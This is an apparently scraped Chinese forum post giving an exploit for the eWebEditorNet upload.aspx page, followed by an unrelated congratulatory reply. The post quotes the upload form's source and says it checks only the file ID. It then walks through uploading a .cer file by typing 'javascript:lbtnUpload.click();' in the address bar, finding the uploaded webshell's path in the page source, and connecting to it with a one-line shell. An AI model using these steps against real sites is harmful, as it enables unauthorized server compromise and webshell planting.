eWebEditorNet 漏洞利用
<H1 class=ContentTitle><STRONG><FONT face=宋体 size=4>原理:eWebEditorNet/upload.aspx文件<BR><form id="myform" method="post" encType="multipart/form-data" runat="server"><BR><INPUT id="uploadfile" style="HEIGHT: 18px" type="file" size="28" name="uploadfile" runat="server"><BR><asp:linkbutton id="lbtnUpload" runat="server"></asp:linkbutton></form><BR><script language="javascript"><BR>// 上传表单已装入完成<BR>try {<BR>parent.UploadLoaded();<BR>}<BR>catch(e){<BR>}<BR></script><BR>只是简单的对文件ID进行验证,只要构造javascript:lbtnUpload.click();就满足条件。<BR><BR>下面开始利用,打开eWebEditorNet/upload.aspx,选择一个cer文件。<BR><BR>再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。<BR><BR>下面用一句话连接一下。</FONT></STRONG></H1>re:eWebEditorNet 漏洞利用
<P><FONT size=2>谢谢各位。6月8日是个好日子哦,6表示顺利,8意味着发。6月8,一路发!!借你们的祝福我会发大财的,哈哈~~~</FONT></P>
页:
[1]